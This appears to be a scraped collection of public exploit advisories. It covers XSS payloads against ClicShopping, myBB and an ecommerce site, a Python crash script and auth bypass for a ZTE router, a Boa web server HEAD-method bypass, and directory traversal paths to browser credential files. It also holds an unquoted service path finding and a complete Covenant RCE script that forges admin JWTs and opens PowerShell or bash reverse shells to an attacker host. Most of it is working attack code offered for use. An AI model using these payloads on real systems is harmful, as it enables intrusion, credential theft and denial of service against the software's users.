ISHACK AI BOT

## Title: ClicShopping v3.402 - Cross-Site Scripting (XSS) ## Author: nu11secur1ty ## Date: 11.20.2022 ## Vendor: https://www.clicshopping.org/forum/ ## Software: https://github.com/ClicShopping/ClicShopping_V3/releases/tag/version3_402 ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3 ## Description: The name of an arbitrarily supplied URL parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can trick users to open a very dangerous link or he can get sensitive information, also he can destroy some components of your system. ## STATUS: HIGH Vulnerability [+] Payload: ```js GET /ClicShopping_V3-version3_402/index.php?Search&AdvancedSearch&bel9c%22onmouseover%3d%22alert(`Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole`)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22zgm9j=1 HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3) ## Proof and Exploit: [href]()https://streamable.com/rzpgsu ## Time spent `1:00` -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: myBB forums 1.8.26 - Stored Cross-Site Scripting (XSS) # Exploit Author: Andrey Stoykov # Software Link: https://mybb.com/versions/1.8.26/ # Version: 1.8.26 # Tested on: Ubuntu 20.04 Stored XSS #1: To reproduce do the following: 1. Login as administrator user 2. Browse to "Templates and Style" -> "Templates" -> "Manage Templates" -> = "Global Templates"=20 3. Select "Add New Template" and enter payload "><img src=3Dx onerror=3Dale= rt(1)> // HTTP POST request showing XSS payload POST /mybb_1826/admin/index.php?module=3Dstyle-templates&action=3Dedit_temp= late HTTP/1.1 Host: 192.168.139.132 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100= 101 Firefox/106.0 [...] my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&title=3D"><img+src=3Dx+onerr= or=3Dalert(1)>&sid=3D-1&template=3D&continue=3DSave+and+Continue+Editing // HTTP redirect response to specific template HTTP/1.1 302 Found Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P= erl/v5.16.3 Location: index.php?module=3Dstyle-templates&action=3Dedit_template&title= =3D%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&sid=3D-1 [...] // HTTP GET request to newly created template GET /mybb_1826/admin/index.php?module=3Dstyle-templates&sid=3D-1 HTTP/1.1 Host: 192.168.139.132 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100= 101 Firefox/106.0 [...] // HTTP response showing unsanitized XSS payload HTTP/1.1 200 OK Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P= erl/v5.16.3 X-Powered-By: PHP/5.6.40 [...] <tr class=3D"first"> <td class=3D"first"><a href=3D"index.php?module=3Dstyle-templates&actio= n=3Dedit_template&title=3D%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3= E&sid=3D-1">"><img src=3Dx onerror=3Dalert(1)></a></td> [...] Stored XSS #2: To reproduce do the following: 1. Login as administrator user 2. Browse to "Forums and Posts" -> "Forum Management" 3. Select "Add New Forum" and enter payload "><script>alert(1)</script> // HTTP POST request showing XSS payload POST /mybb_1826/admin/index.php?module=3Dforum-management&action=3Dadd HTTP= /1.1 Host: 192.168.139.132 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100= 101 Firefox/106.0 [...] my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&type=3Df&title=3D"><script>a= lert(1)</script>&description=3D"><script>alert(2)</script[...] // HTTP response showing successfully added a new forum HTTP/1.1 200 OK Date: Sun, 20 Nov 2022 11:00:28 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P= erl/v5.16.3 [...] // HTTP GET request to fetch forums GET /mybb_1826/admin/index.php?module=3Dforum-management HTTP/1.1 Host: 192.168.139.132 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100= 101 Firefox/106.0 [...] // HTTP response showing unsanitized XSS payload HTTP/1.1 200 OK Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P= erl/v5.16.3 [...] <small>Sub Forums: <a href=3D"index.php?module=3Dforum-management&fid= =3D3">"><script>alert(1)</script></a></small> Stored XSS #3: To reproduce do the following: 1. Login as administrator user 2. Browse to "Forums and Posts" -> "Forum Announcements" 3. Select "Add Announcement" and enter payload "><img+src=3Dx+onerror=3Dale= rt(1)> // HTTP POST request showing XSS payload POST /mybb_1826/admin/index.php?module=3Dforum-announcements&action=3Dadd H= TTP/1.1 Host: 192.168.139.132 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100= 101 Firefox/106.0 [...] my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&title=3D"><img+src=3Dx+onerr= or=3Dalert(1)>&starttime_day=3D20&starttime_month=3D11&starttime_year=3D202= 2&starttime_time=3D11:05+AM&endtime_day=3D20&endtime_month=3D11&endtime_yea= r=3D2023&endtime_time=3D11:05+AM&endtime_type=3D2&message=3D"><script>alert= (2)</script>&fid=3D2&allowmycode=3D1&allowsmilies=3D1 // HTTP response showing successfully added an anouncement HTTP/1.1 302 Found Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P= erl/v5.16.3 [...] // HTTP GET request to fetch forum URL GET /mybb_1826/ HTTP/1.1 Host: 192.168.139.132 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100= 101 Firefox/106.0 [...] // HTTP response showing unsanitized XSS payload HTTP/1.1 200 OK Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P= erl/v5.16.3 [...] <a href=3D"forumdisplay.php?fid=3D3" title=3D"">"><script>alert(1)</script>= </a> --sgnirk-590ebdc0-1da1-4f35-a731-39a2519b1c0d--

# Exploit Title: ZTE-H108NS - Stack Buffer Overflow (DoS) # Date: 19-11-2022 # Exploit Author: George Tsimpidas # Vendor: https://www.zte.com.cn/global/ # Firmware: H108NSV1.0.7u_ZRD_GR2_A68 # Usage: python zte-exploit.py <victim-ip> <port> # CVE: N/A # Tested on: Debian 5.18.5 #!/usr/bin/python3 import sys import socket from time import sleep host = sys.argv[1] # Recieve IP from user port = int(sys.argv[2]) # Recieve Port from user junk = b"1500Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae" * 5 buffer = b"GET /cgi-bin/tools_test.asp?testFlag=1&Test_PVC=0&pingtest_type=Yes&IP=192.168.1.1" + junk + b"&TestBtn=START HTTP/1.1\r\n" buffer += b"Host: 192.168.1.1\r\n" buffer += b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\r\n" buffer += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n" buffer += b"Accept-Language: en-US,en;q=0.5\r\n" buffer += b"Accept-Encoding: gzip, deflate\r\n" buffer += b"Authorization: Basic YWRtaW46YWRtaW4=\r\n" buffer += b"Connection: Keep-Alive\r\n" buffer += b"Cookie: SID=21caea85fe39c09297a2b6ad4f286752fe47e6c9c5f601c23b58432db13298f2; _TESTCOOKIESUPPORT=1; SESSIONID=53483d25\r\n" buffer += b"Upgrade-Insecure-Requests: 1\r\n\r\n" print("[*] Sending evil payload...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(buffer) sleep(1) s.close() print("[+] Crashing boom boom ~ check if target is down ;)")

# Exploit Title: Router ZTE-H108NS - Authentication Bypass # Date: 19-11-2022 # Exploit Author: George Tsimpidas # Vendor: https://www.zte.com.cn/global/ # Firmware: H108NSV1.0.7u_ZRD_GR2_A68 # CVE: N/A # Tested on: Debian 5.18.5 Description : When specific http methods are listed within a security constraint, then only those methods are protected. Router ZTE-H108NS defines the following http methods: GET, POST, and HEAD. HEAD method seems to fall under a flawed operation which allows the HEAD to be implemented correctly with every Response Status Code. Proof Of Concept : Below request bypasses successfully the Basic Authentication, and grants access to the Administration Panel of the Router. HEAD /cgi-bin/tools_admin.asp HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: SESSIONID=1cd6bb77 Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0

# Exploit Title: Boa Web Server v0.94.14 - Authentication Bypass #Date: 19-11-2022 # Exploit Author: George Tsimpidas # Vendor: https://github.com/gpg/boa # CVE: N/A # Tested on: Debian 5.18.5 Description : Boa Web Server Versions from 0.94.13 - 0.94.14 fail to validate the correct security constraint on the HEAD http method allowing everyone to bypass the Basic Authorization Mechanism. Culprit : if (!memcmp(req->logline, "GET ", 4)) req->method = M_GET; else if (!memcmp(req->logline, "HEAD ", 5)) /* head is just get w/no body */ req->method = M_HEAD; else if (!memcmp(req->logline, "POST ", 5)) req->method = M_POST; else { log_error_doc(req); fprintf(stderr, "malformed request: \"%s\"\n", req->logline); send_r_not_implemented(req); return 0; } The req->method = M_HEAD; is being parsed directly on the response.c file, looking at how the method is being implemented for one of the response codes : /* R_NOT_IMP: 505 */ void send_r_bad_version(request * req) { SQUASH_KA(req); req->response_status = R_BAD_VERSION; if (!req->simple) { req_write(req, "HTTP/1.0 505 HTTP Version Not Supported\r\n"); print_http_headers(req); req_write(req, "Content-Type: " HTML "\r\n\r\n"); /* terminate header */ } if (req->method != M_HEAD) { req_write(req, "<HTML><HEAD><TITLE>505 HTTP Version Not Supported</TITLE></HEAD>\n" "<BODY><H1>505 HTTP Version Not Supported</H1>\nHTTP versions " "other than 0.9 and 1.0 " "are not supported in Boa.\n<p><p>Version encountered: "); req_write(req, req->http_version); req_write(req, "<p><p></BODY></HTML>\n"); } req_flush(req); } Above code condition indicates that if (req->method != M_HEAD) therefore if the the requested method does not equal to M_HEAD then req_write(req, "<HTML><HEAD><TITLE>505 HTTP Version Not Supported</TITLE></HEAD>\n" "<BODY><H1>505 HTTP Version Not Supported</H1>\nHTTP versions " "other than 0.9 and 1.0 " "are not supported in Boa.\n<p><p>Version encountered: "); req_write(req, req->http_version); req_write(req, "<p><p></BODY></HTML>\n"); } So if the method actually contains the http method of HEAD it's being passed for every function that includes all the response code methods.

## Title: Ecommerse v1.0 - Cross-Site Scripting (XSS) ## Author: nu11secur1ty ## Date: 11.23.2022 ## Vendor: https://github.com/winston-dsouza ## Software: https://github.com/winston-dsouza/ecommerce-website ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website ## Description: The value of the eMail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can trick the users of this system, very easy to visit a very dangerous link from anywhere, and then the game will over for these customers. Also, the attacker can create a network from botnet computers by using this vulnerability. ## STATUS: HIGH Vulnerability - CRITICAL [+] Exploit: ```POST POST /ecommerce/index.php?error=If%20you%20lose%20your%20credentials%20information,%20please%20use%20our%20recovery%20webpage%20to%20recover%20your%20account.%20https://localhost HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f Origin: http://pwnedhost.com Upgrade-Insecure-Requests: 1 Referer: http://pwnedhost.com/ecommerce/index.php Content-Type: application/x-www-form-urlencoded Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 0 ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website) ## Proof and Exploit: [href](https://streamable.com/3r4t36) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: Covenant v0.5 - Remote Code Execution (RCE) # Exploit Author: xThaz # Author website: https://xthaz.fr/ # Date: 2022-09-11 # Vendor Homepage: https://cobbr.io/Covenant.html # Software Link: https://github.com/cobbr/Covenant # Version: v0.1.3 - v0.5 # Tested on: Windows 11 compiled covenant (Windows defender disabled), Linux covenant docker # Vulnerability ## Discoverer: coastal ## Date: 2020-07-13 ## Discoverer website: https://blog.null.farm ## References: ## - https://blog.null.farm/hunting-the-hunters ## - https://github.com/Zeop-CyberSec/covenant_rce/blob/master/covenant_jwt_rce.rb # !/usr/bin/env python3 # encoding: utf-8 import jwt # pip3 install PyJWT import json import warnings import base64 import re import random import argparse from requests.packages.urllib3.exceptions import InsecureRequestWarning from Crypto.Hash import HMAC, SHA256 # pip3 install pycryptodome from Crypto.Util.Padding import pad from Crypto.Cipher import AES from requests import request # pip3 install requests from subprocess import run from pwn import remote, context # pip3 install pwntools from os import remove, urandom from shutil import which from urllib.parse import urlparse from pathlib import Path from time import time def check_requirements(): if which("mcs") is None: print("Please install the mono framework in order to compile the payload.") print("https://www.mono-project.com/download/stable/") exit(-1) def random_hex(length): alphabet = "0123456789abcdef" return ''.join(random.choice(alphabet) for _ in range(length)) def request_api(method, token, route, body=""): warnings.simplefilter('ignore', InsecureRequestWarning) return request( method, f"{args.target}/api/{route}", json=body, headers={ "Authorization": f"Bearer {token}", "Content-Type": "application/json" }, verify=False ) def craft_jwt(username, userid=f"{random_hex(8)}-{random_hex(4)}-{random_hex(4)}-{random_hex(4)}-{random_hex(12)}"): secret_key = '%cYA;YK,lxEFw[&P{2HwZ6Axr,{e&3o_}_P%NX+(q&0Ln^#hhft9gTdm\'q%1ugAvfq6rC' payload_data = { "sub": username, "jti": "925f74ca-fc8c-27c6-24be-566b11ab6585", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": userid, "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [ "User", "Administrator" ], "exp": int(time()) + 360, "iss": "Covenant", "aud": "Covenant" } token = jwt.encode(payload_data, secret_key, algorithm='HS256') return token def get_id_admin(token, json_roles): id_admin = "" for role in json_roles: if role["name"] == "Administrator": id_admin = role["id"] print(f"\t[*] Found the admin group id : {id_admin}") break else: print("\t[!] Did not found admin group id, quitting !") exit(-1) id_admin_user = "" json_users_roles = request_api("get", token, f"users/roles").json() for user_role in json_users_roles: if user_role["roleId"] == id_admin: id_admin_user = user_role["userId"] print(f"\t[*] Found the admin user id : {id_admin_user}") break else: print("\t[!] Did not found admin id, quitting !") exit(-1) json_users = request_api("get", token, f"users").json() for user in json_users: if user["id"] == id_admin_user: username_admin = user["userName"] print(f"\t[*] Found the admin username : {username_admin}") return username_admin, id_admin_user else: print("\t[!] Did not found admin username, quitting !") exit(-1) def compile_payload(): if args.os == "windows": payload = '"powershell.exe", "-nop -c \\"$client = New-Object System.Net.Sockets.TCPClient(\'' + args.lhost + '\',' + args.lport + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\""' else: payload = '"bash", "-c \\"exec bash -i &>/dev/tcp/' + args.lhost + '/' + args.lport + ' <&1\\""' dll = """using System; using System.Reflection; namespace ExampleDLL{ public class Class1{ public Class1(){ } public void Main(string[] args){ System.Diagnostics.Process.Start(""" + payload + """); } } } """ temp_dll_path = f"/tmp/{random_hex(8)}" Path(f"{temp_dll_path}.cs").write_bytes(dll.encode()) print(f"\t[*] Writing payload in {temp_dll_path}.cs") compilo_path = which("mcs") compilation = run([compilo_path, temp_dll_path + ".cs", "-t:library"]) if compilation.returncode: print("\t[!] Error when compiling DLL, quitting !") exit(-1) print(f"\t[*] Successfully compiled the DLL in {temp_dll_path}.dll") dll_encoded = base64.b64encode(Path(f"{temp_dll_path}.dll").read_bytes()).decode() remove(temp_dll_path + ".cs") remove(temp_dll_path + ".dll") print(f"\t[*] Removed {temp_dll_path}.cs and {temp_dll_path}.dll") return dll_encoded def generate_wrapper(dll_encoded): wrapper = """public static class MessageTransform { public static string Transform(byte[] bytes) { try { string assemblyBase64 = \"""" + dll_encoded + """\"; var assemblyBytes = System.Convert.FromBase64String(assemblyBase64); var assembly = System.Reflection.Assembly.Load(assemblyBytes); foreach (var type in assembly.GetTypes()) { object instance = System.Activator.CreateInstance(type); object[] args = new object[] { new string[] { \"\" } }; try { type.GetMethod(\"Main\").Invoke(instance, args); } catch {} } } catch {} return System.Convert.ToBase64String(bytes); } public static byte[] Invert(string str) { return System.Convert.FromBase64String(str); } }""" return wrapper def upload_profile(token, wrapper): body = { 'httpUrls': [ '/en-us/index.html', '/en-us/docs.html', '/en-us/test.html' ], 'httpRequestHeaders': [ {'name': 'User-Agent', 'value': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 ' 'Safari/537.36'}, {'name': 'Cookie', 'value': 'ASPSESSIONID={GUID}; SESSIONID=1552332971750'} ], 'httpResponseHeaders': [ {'name': 'Server', 'value': 'Microsoft-IIS/7.5'} ], 'httpPostRequest': 'i=a19ea23062db990386a3a478cb89d52e&data={DATA}&session=75db-99b1-25fe4e9afbe58696-320bea73', 'httpGetResponse': '{DATA}', 'httpPostResponse': '{DATA}', 'id': 0, 'name': random_hex(8), 'description': '', 'type': 'HTTP', 'messageTransform': wrapper } response = request_api("post", token, "profiles/http", body) if not response.ok: print("\t[!] Failed to create the listener profile, quitting !") exit(-1) else: profile_id = response.json().get('id') print(f"\t[*] Profile created with id {profile_id}") print("\t[*] Successfully created the listener profile") return profile_id def generate_valid_listener_port(impersonate_token, tries=0): if tries >= 10: print("\t[!] Tried 10 times to generate a listener port but failed, quitting !") exit(-1) port = random.randint(8000, 8250) # TO BE EDITED WITH YOUR TARGET LISTENER PORT listeners = request_api("get", impersonate_token, "listeners").json() port_used = [] for listener in listeners: port_used.append(listener["bindPort"]) if port in port_used: print(f"\t[!] Port {port} is already taken by another listener, retrying !") generate_valid_listener_port(impersonate_token, tries + 1) else: print(f"\t[*] Port {port} seems free") return port def get_id_listener_type(impersonate_token, listener_name): response = request_api("get", impersonate_token, "listeners/types") if not response.ok: print("\t[!] Failed to get the listener type, quitting !") exit(-1) else: for listener_type in response.json(): if listener_type["name"] == listener_name: print(f'\t[*] Found id {listener_type["id"]} for listener {listener_name}') return listener_type["id"] def generate_listener(impersonate_token, profile_id): listener_port = generate_valid_listener_port(impersonate_token) listener_name = random_hex(8) data = { 'useSSL': False, 'urls': [ f"http://0.0.0.0:{listener_port}" ], 'id': 0, 'name': listener_name, 'bindAddress': "0.0.0.0", 'bindPort': listener_port, 'connectAddresses': [ "0.0.0.0" ], 'connectPort': listener_port, 'profileId': profile_id, 'listenerTypeId': get_id_listener_type(impersonate_token, "HTTP"), 'status': 'Active' } response = request_api("post", impersonate_token, "listeners/http", data) if not response.ok: print("\t[!] Failed to create the listener, quitting !") exit(-1) else: print("\t[*] Successfully created the listener") listener_id = response.json().get("id") return listener_id, listener_port def create_grunt(impersonate_token, data): stager_code = request_api("put", impersonate_token, "launchers/binary", data).json()["stagerCode"] if stager_code == "": stager_code = request_api("post", impersonate_token, "launchers/binary", data).json()["stagerCode"] if stager_code == "": print("\t[!] Failed to create the grunt payload, quitting !") exit(-1) print("\t[*] Successfully created the grunt payload") return stager_code def get_grunt_config(impersonate_token, listener_id): data = { 'id': 0, 'listenerId': listener_id, 'implantTemplateId': 1, 'name': 'Binary', 'description': 'Uses a generated .NET Framework binary to launch a Grunt.', 'type': 'binary', 'dotNetVersion': 'Net35', 'runtimeIdentifier': 'win_x64', 'validateCert': True, 'useCertPinning': True, 'smbPipeName': 'string', 'delay': 0, 'jitterPercent': 0, 'connectAttempts': 0, 'launcherString': 'GruntHTTP.exe', 'outputKind': 'consoleApplication', 'compressStager': False } stager_code = create_grunt(impersonate_token, data) aes_key = re.search(r'FromBase64String\(@\"(.[A-Za-z0-9+\/=]{40,50}?)\"\);', stager_code) guid_prefix = re.search(r'aGUID = @"(.{10}[0-9a-f]?)";', stager_code) if not aes_key or not guid_prefix: print("\t[!] Failed to retrieve the grunt configuration, quitting !") exit(-1) aes_key = aes_key.group(1) guid_prefix = guid_prefix.group(1) print(f"\t[*] Found the grunt configuration {[aes_key, guid_prefix]}") return aes_key, guid_prefix def aes256_cbc_encrypt(key, message): iv_bytes = urandom(16) key_decoded = base64.b64decode(key) encoded_message = pad(message.encode(), 16) cipher = AES.new(key_decoded, AES.MODE_CBC, iv_bytes) encrypted = cipher.encrypt(encoded_message) hmac = HMAC.new(key_decoded, digestmod=SHA256) signature = hmac.update(encrypted).digest() return encrypted, iv_bytes, signature def trigger_exploit(listener_port, aes_key, guid): message = "<RSAKeyValue><Modulus>tqwoOYfwOkdfax+Er6P3leoKE/w5wWYgmb/riTpSSWCA6T2JklWrPtf9z3s/k0wIi5pX3jWeC5RV5Y/E23jQXPfBB9jW95pIqxwhZ1wC2UOVA8eSCvqbTpqmvTuFPat8ek5piS/QQPSZG98vLsfJ2jQT6XywRZ5JgAZjaqmwUk/lhbUedizVAnYnVqcR4fPEJj2ZVPIzerzIFfGWQrSEbfnjp4F8Y6DjNSTburjFgP0YdXQ9S7qCJ983vM11LfyZiGf97/wFIzXf7pl7CsA8nmQP8t46h8b5hCikXl1waEQLEW+tHRIso+7nBv7ciJ5WgizSAYfXfePlw59xp4UMFQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>" ciphered, iv, signature = aes256_cbc_encrypt(aes_key, message) data = { "GUID": guid, "Type": 0, "Meta": '', "IV": base64.b64encode(iv).decode(), "EncryptedMessage": base64.b64encode(ciphered).decode(), "HMAC": base64.b64encode(signature).decode() } json_data = json.dumps(data).encode("utf-8") payload = f"i=a19ea23062db990386a3a478cb89d52e&data={base64.urlsafe_b64encode(json_data).decode()}&session=75db-99b1-25fe4e9afbe58696-320bea73" if send_exploit(listener_port, "Cookie", guid, payload): print("\t[*] Exploit succeeded, check listener") else : print("\t[!] Exploit failed, retrying") if send_exploit(listener_port, "Cookies", guid, payload): print("\t[*] Exploit succeeded, check listener") else: print("\t[!] Exploit failed, quitting") def send_exploit(listener_port, header_cookie, guid, payload): context.log_level = 'error' request = f"""POST /en-us/test.html HTTP/1.1\r Host: {IP_TARGET}:{listener_port}\r User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r {header_cookie}: ASPSESSIONID={guid}; SESSIONID=1552332971750\r Content-Type: application/x-www-form-urlencoded\r Content-Length: {len(payload)}\r \r {payload} """.encode() sock = remote(IP_TARGET, listener_port) sock.sendline(request) response = sock.recv().decode() sock.close() if "HTTP/1.1 200 OK" in response: return True else: return False if __name__ == "__main__": check_requirements() parser = argparse.ArgumentParser() parser.add_argument("target", help="URL where the Covenant is hosted, example : https://127.0.0.1:7443") parser.add_argument("os", help="Operating System of the target", choices=["windows", "linux"]) parser.add_argument("lhost", help="IP of the machine that will receive the reverse shell") parser.add_argument("lport", help="Port of the machine that will receive the reverse shell") args = parser.parse_args() IP_TARGET = urlparse(args.target).hostname print("[*] Getting the admin info") sacrificial_token = craft_jwt("xThaz") roles = request_api("get", sacrificial_token, "roles").json() admin_username, admin_id = get_id_admin(sacrificial_token, roles) impersonate_token = craft_jwt(admin_username, admin_id) print(f"\t[*] Impersonated {[admin_username]} with the id {[admin_id]}") print("[*] Generating payload") dll_encoded = compile_payload() wrapper = generate_wrapper(dll_encoded) print("[*] Uploading malicious listener profile") profile_id = upload_profile(impersonate_token, wrapper) print("[*] Generating listener") listener_id, listener_port = generate_listener(impersonate_token, profile_id) print("[*] Triggering the exploit") aes_key, guid_prefix = get_grunt_config(impersonate_token, listener_id) trigger_exploit(listener_port, aes_key, f"{guid_prefix}{random_hex(10)}")

# Exploit Title: Virtual Reception v1.0 - Web Server Directory Traversal # Exploit Author: Spinae # Vendor Homepage: https://www.virtualreception.nl/ # Version: win7sp1_rtm.101119-1850 6.1.7601.1.0.65792 running on an Intel NUC5i5RY # Tested on: all # CVE-ID: CVE-2023-25289 We discovered the web server of the Virtual Reception appliance is prone to an unauthenticated directory traversal vulnerability. This allows an attacker to traverse outside the server root directory by specifying files at the end of a URL request. This is a NUC5i5RY http://[ip address]/c:/WINDOWS/System32/drivers/etc/hosts http://[ip address]/C:/windows/WindowsUpdate.log ... A user called 'receptie' exists on the Windows system: http://[ip address]/c:/users/receptie/ntuser.dat http://[ip address]/c:/users/receptie/ntuser.ini http://[ip address]/c:/users/receptie/appdata/local/temp/wmsetup.log ... http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User Data/Default/Login Data http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User%20Data/Local%20State http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User Data/Default/Cookies ... The appliance also keeps a log of the visitors that register at the entrance: http://[ip address]/visitors.csv hash icon for shodan searches: https://www.shodan.io/search?query=http.favicon.hash%3A656388049 No reply from the vendor (phone, email, website form submissions), first reported in 2021. -- DISCLAIMER: Unless indicated otherwise, the information contained in this message is privileged and confidential, and is intended only for the use of the addressee(s) named above and others who have been specifically authorized to receive it. If you are not the intended recipient, you are hereby notified that any dissemination, distribution or copying of this message and/or attachments is strictly prohibited. The company accepts no liability for any damage caused by any virus transmitted by this message. Furthermore, the company does not warrant a proper and complete transmission of this information, nor does it accept liability for any delays. If you have received this message in error, please contact the sender and delete the message. Thank you.

#Exploit Title: Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path # Author: P4p4 M4n3 # Discovery Date: 25-11-2022 # Vendor Homepage: https://webcompanion.com/en/ # Version 4.1.0.409 # Tested on: Microsoft Windows Server 2019 Datacenter x64 # Description: # Lavasoft 4.1.0.409 install DCIservice as a service with an unquoted service path # POC https://youtu.be/yb8AavCMbes #Discover the Unquoted Service path C:\Users\p4p4\> wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ DCIService C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe Auto C:\Users\p4p4> sc qc DCIService [SC] QueryServiceConfig réussite(s) SERVICE_NAME: DCIService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : DCIService DEPENDENCIES : SERVICE_START_NAME : LocalSystem

